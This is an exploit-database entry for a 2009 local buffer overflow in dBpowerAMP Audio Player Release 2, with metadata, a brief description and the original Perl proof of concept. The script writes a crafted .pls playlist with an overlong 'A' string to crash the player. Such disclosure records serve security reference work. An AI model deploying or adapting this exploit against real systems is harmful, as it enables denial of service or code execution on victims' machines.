header-logo
Suggest Exploit
vendor:
Audio Player
by:
Mountassif Moad a.k.a Stack
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Audio Player
Affected Version From: 2.PLS
Affected Version To: 2.PLS
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

dBpowerAMP Audio Player Release 2.PLS Local Buffer Overflow Exploit

dBpowerAMP Audio Player Release 2.PLS contains a local buffer overflow vulnerability. The vulnerability is triggered when a specially crafted .pls file is opened, resulting in a stack overflow. The exploit is triggered by a 257 byte long string of A's, followed by a 1000 byte long string of A's for stack overflow, and a 3000 byte long string of A's for heap overflow.

Mitigation:

Users should avoid opening untrusted .pls files.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# dBpowerAMP Audio Player Release 2.PLS Local Buffer Overflow Exploit
# Down : http://www.dbpoweramp.com/bin/dBpowerAMP-r2.exe
# Desc : in 257  A' Basic buffer overflow
#        in 1000 A' Stack overflow
#        in 3000 A' Heap overflow
# By Mountassif Moad a.k.a Stack
# v4 Team & evil finger
use strict;
use warnings;
my $A= "\x41" x 257;
open(my $pls_playlist, "> stack.pls");
print $pls_playlist "[playlist]\r\n".
      "NumberOfEntries=1\r\n".
                    "File1=http://".
                    $A.
                    "\r\n";
close $pls_playlist;

# milw0rm.com [2009-01-13]

Navigation

Suggest Exploit

Services By CQR